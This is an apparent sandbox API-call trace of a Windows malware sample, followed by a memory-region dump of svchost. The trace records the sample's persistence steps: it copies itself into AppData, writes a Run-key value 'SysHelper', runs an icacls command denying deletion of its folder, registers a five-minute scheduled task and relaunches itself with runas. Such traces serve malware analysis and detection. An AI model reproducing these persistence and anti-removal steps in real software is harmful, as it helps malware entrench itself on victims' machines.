pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0090.411] UuidCreate (in: Uuid=0x18e9b4 | out: Uuid=0x18e9b4) returned 0x0 [0090.411] UuidToStringW (in: Uuid=0x18e9b4, StringUuid=0x18ea48 | out: StringUuid=0x18ea48) returned 0x0 [0090.411] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x50) returned 0x2b468d8 [0090.411] RpcMgmtStatsVectorFree (in: StatsVector=0x18ea48 | out: StatsVector=0x18ea48) returned 0x0 [0090.411] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="11c63de0-7744-463b-80d8-a375eb15d14b" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b") returned 1 [0090.411] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b"), lpSecurityAttributes=0x0) returned 1 [0090.413] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x90) returned 0x2ae8a90 [0090.413] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x90) returned 0x6c69c0 [0090.413] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b", pMore="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned 1 [0090.413] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0 [0090.414] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe"), bFailIfExists=0) returned 1 [0090.453] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea44 | out: phkResult=0x18ea44*=0x4ec) returned 0x0 [0090.453] lstrcpyW (in: lpString1=0x18d968, lpString2="\"" | out: lpString1="\"") returned="\"" [0090.453] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" | out: lpString1="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0090.453] lstrcatW (in: lpString1="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart") returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart" [0090.453] lstrlenW (lpString="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart") returned 152 [0090.453] RegSetValueExW (in: hKey=0x4ec, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart", cbData=0x130 | out: lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart") returned 0x0 [0090.454] RegCloseKey (hKey=0x4ec) returned 0x0 [0090.454] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x120) returned 0x2afd928 [0090.454] SetLastError (dwErrCode=0x0) [0090.454] lstrcpyW (in: lpString1=0x18b968, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0090.454] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b" | out: lpString1="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b") returned="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b" [0090.454] lstrcatW (in: lpString1="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0090.454] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e968*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e9c4 | out: lpCommandLine="icacls \"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18e9c4*(hProcess=0x4e8, hThread=0x4ec, dwProcessId=0xf48, dwThreadId=0xf4c)) returned 1 [0090.467] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.662] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.734] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.743] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.759] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.774] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.790] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.805] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.821] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.844] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x102 [0090.852] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0x1) returned 0x0 [0090.854] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c69c0 | out: hHeap=0x5d0000) returned 1 [0090.854] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b468d8 | out: hHeap=0x5d0000) returned 1 [0090.854] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x120) returned 0x2a992b8 [0090.854] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x120) returned 0x2b0f330 [0090.855] CoInitialize (pvReserved=0x0) returned 0x0 [0090.871] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0090.879] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x120) returned 0x2b033d8 [0090.879] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ea2c | out: ppv=0x18ea2c*=0x3bff68) returned 0x0 [0091.645] TaskScheduler:ITaskService:Connect (This=0x3bff68, serverName=0x18e4b8*(varType=0x0, wReserved1=0x2a9, wReserved2=0x92b0, wReserved3=0x2a9, varVal1=0x8f, varVal2=0x120), user=0x18e4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x128), domain=0x18e4d8*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), password=0x18e4e8*(varType=0x0, wReserved1=0x2b0, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x5d0000)) returned 0x0 [0091.659] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b13560 [0091.659] TaskScheduler:ITaskService:GetFolder (in: This=0x3bff68, Path="\\", ppFolder=0x18ea34 | out: ppFolder=0x18ea34*=0x2630448) returned 0x0 [0091.664] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b13560 | out: hHeap=0x5d0000) returned 1 [0091.664] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b13560 [0091.664] ITaskFolder:DeleteTask (This=0x2630448, Name="Time Trigger Task", flags=0) returned 0x80070002 [0091.668] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b13560 | out: hHeap=0x5d0000) returned 1 [0091.669] TaskScheduler:ITaskService:NewTask (in: This=0x3bff68, flags=0x0, ppDefinition=0x18ea38 | out: ppDefinition=0x18ea38*=0x26304a0) returned 0x0 [0091.676] TaskScheduler:IUnknown:Release (This=0x3bff68) returned 0x1 [0091.676] ITaskDefinition:get_RegistrationInfo (in: This=0x26304a0, ppRegistrationInfo=0x18ea0c | out: ppRegistrationInfo=0x18ea0c*=0x2630560) returned 0x0 [0091.676] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b135a8 [0091.676] IRegistrationInfo:put_Author (This=0x2630560, Author="Author Name") returned 0x0 [0091.676] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0091.676] IUnknown:Release (This=0x2630560) returned 0x1 [0091.676] ITaskDefinition:get_Principal (in: This=0x26304a0, ppPrincipal=0x18ea14 | out: ppPrincipal=0x18ea14*=0x26306f0) returned 0x0 [0091.676] IPrincipal:put_LogonType (This=0x26306f0, LogonType=3) returned 0x0 [0091.676] IUnknown:Release (This=0x26306f0) returned 0x1 [0091.676] ITaskDefinition:get_Settings (in: This=0x26304a0, ppSettings=0x18ea1c | out: ppSettings=0x18ea1c*=0x2630610) returned 0x0 [0091.677] ITaskSettings:put_StartWhenAvailable (This=0x2630610, StartWhenAvailable=1) returned 0x0 [0091.677] IUnknown:Release (This=0x2630610) returned 0x1 [0091.677] ITaskSettings:get_IdleSettings (in: This=0x2630610, ppIdleSettings=0x18ea00 | out: ppIdleSettings=0x18ea00*=0x2630680) returned 0x0 [0091.677] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b135a8 [0091.677] IIdleSettings:put_WaitTimeout (This=0x2630680, WaitTimeout="PT5M") returned 0x0 [0091.677] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0091.677] IUnknown:Release (This=0x2630680) returned 0x1 [0091.677] ITaskDefinition:get_Triggers (in: This=0x26304a0, ppTriggers=0x18e9fc | out: ppTriggers=0x18e9fc*=0x26305d0) returned 0x0 [0091.677] ITriggerCollection:Create (in: This=0x26305d0, Type=1, ppTrigger=0x18ea08 | out: ppTrigger=0x18ea08*=0x2630750) returned 0x0 [0091.678] IUnknown:Release (This=0x26305d0) returned 0x1 [0091.678] IUnknown:QueryInterface (in: This=0x2630750, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18ea24 | out: ppvObject=0x18ea24*=0x2630750) returned 0x0 [0091.678] IUnknown:Release (This=0x2630750) returned 0x2 [0091.678] ITrigger:get_Repetition (in: This=0x2630750, ppRepeat=0x18ea10 | out: ppRepeat=0x18ea10*=0x26307a0) returned 0x0 [0091.678] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b135a8 [0091.678] IRepetitionPattern:put_Interval (This=0x26307a0, Interval="PT5M") returned 0x0 [0091.678] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0091.678] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b135a8 [0091.678] IRepetitionPattern:put_Duration (This=0x26307a0, Duration="") returned 0x0 [0091.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0091.681] ITrigger:put_Repetition (This=0x2630750, Repetition=0x26307a0) returned 0x0 [0091.681] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b135a8 [0091.681] ITrigger:put_Id (This=0x2630750, Id="Trigger1") returned 0x0 [0091.681] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0091.681] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b135a8 [0091.681] ITrigger:put_EndBoundary (This=0x2630750, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0091.681] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0091.681] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e4e4 | out: lpSystemTimeAsFileTime=0x18e4e4*(dwLowDateTime=0x9e0133e0, dwHighDateTime=0x1d8a8ba)) [0091.688] GetLastError () returned 0x0 [0091.701] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x2b00eb0 [0091.721] GetLastError () returned 0x0 [0091.734] GetLastError () returned 0x0 [0091.741] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0091.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x18e44c) returned 24 [0091.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x18e44c) returned 24 [0091.793] GetLastError () returned 0x0 [0091.793] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x2b00e50 [0091.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x2b00e50, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0091.793] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa0) returned 0x68dd58 [0091.793] GetLastError () returned 0x0 [0091.793] ITrigger:put_StartBoundary (This=0x2630750, StartBoundary="2022-08-05T13:21:47") returned 0x0 [0091.793] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0091.794] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b977a0 | out: hHeap=0x5d0000) returned 1 [0091.794] IUnknown:Release (This=0x2630750) returned 0x1 [0091.794] ITaskDefinition:get_Actions (in: This=0x26304a0, ppActions=0x18ea18 | out: ppActions=0x18ea18*=0x2630518) returned 0x0 [0091.794] IActionCollection:Create (in: This=0x2630518, Type=0, ppAction=0x18ea04 | out: ppAction=0x18ea04*=0x26307e8) returned 0x0 [0091.795] IUnknown:Release (This=0x2630518) returned 0x1 [0091.795] IUnknown:QueryInterface (in: This=0x26307e8, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18ea20 | out: ppvObject=0x18ea20*=0x26307e8) returned 0x0 [0091.795] IUnknown:Release (This=0x26307e8) returned 0x2 [0091.795] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b135a8 [0091.795] IExecAction:put_Path (This=0x26307e8, Path="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned 0x0 [0091.795] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0091.795] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b135a8 [0091.795] IExecAction:put_Arguments (This=0x26307e8, Arguments="--Task") returned 0x0 [0091.795] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0091.795] IUnknown:Release (This=0x26307e8) returned 0x1 [0091.795] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x2b135a8 [0091.795] ITaskFolder:RegisterTaskDefinition (in: This=0x2630448, Path="Time Trigger Task", pDefinition=0x26304a0, flags=6, UserId=0x18e4c0*(varType=0x0, wReserved1=0x2b0, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x5d0000), password=0x18e4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), LogonType=3, sddl=0x18e4e4*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x128), ppTask=0x18e9ec | out: ppTask=0x18e9ec*=0x2630868) returned 0x0 [0092.003] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b135a8 | out: hHeap=0x5d0000) returned 1 [0092.003] TaskScheduler:IUnknown:Release (This=0x2630448) returned 0x0 [0092.003] TaskScheduler:IUnknown:Release (This=0x26304a0) returned 0x0 [0092.003] IUnknown:Release (This=0x2630868) returned 0x0 [0092.003] CoUninitialize () [0092.010] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b033d8 | out: hHeap=0x5d0000) returned 1 [0092.011] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b0f330 | out: hHeap=0x5d0000) returned 1 [0092.011] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2a992b8 | out: hHeap=0x5d0000) returned 1 [0092.011] GetVersion () returned 0x1db10106 [0092.011] lstrcpyW (in: lpString1=0x18ee50, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0092.011] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0092.011] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0092.011] ShellExecuteExW (in: pExecInfo=0x18ec14*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\kEecfMwgj\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18ec14*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\kEecfMwgj\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0093.981] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2ae8a90 | out: hHeap=0x5d0000) returned 1 [0093.981] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2afd928 | out: hHeap=0x5d0000) returned 1 [0093.992] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60c328 | out: hHeap=0x5d0000) returned 1 [0094.053] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6073f8 | out: hHeap=0x5d0000) returned 1 [0094.053] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e3208 | out: hHeap=0x5d0000) returned 1 [0094.054] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b01de0 | out: hHeap=0x5d0000) returned 1 [0094.054] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b014e8 | out: hHeap=0x5d0000) returned 1 [0094.087] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f19c8 | out: hHeap=0x5d0000) returned 1 [0094.128] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f0668 | out: hHeap=0x5d0000) returned 1 [0094.141] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0094.142] ExitProcess (uExitCode=0x0) [0094.147] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2b00eb0 | out: hHeap=0x5d0000) returned 1 [0094.147] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ef1c8 | out: hHeap=0x5d0000) returned 1 Thread: id = 3 os_tid = 0xf28 Thread: id = 4 os_tid = 0xf2c Thread: id = 5 os_tid = 0xf30 Thread: id = 6 os_tid = 0xf34 Thread: id = 7 os_tid = 0xf38 Thread: id = 8 os_tid = 0xf3c Thread: id = 62 os_tid = 0xf54 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x89ef000" os_pid = "0x368" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d967" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 473 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 474 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 475 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 476 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 477 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 478 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 479 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 480 start_va = 0xe0000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 481 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 482 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 483 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 484 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 485 start_va = 0x210000 end_va = 0x21afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 486 start_va = 0x220000 end_va = 0x22cfff monitored = 0 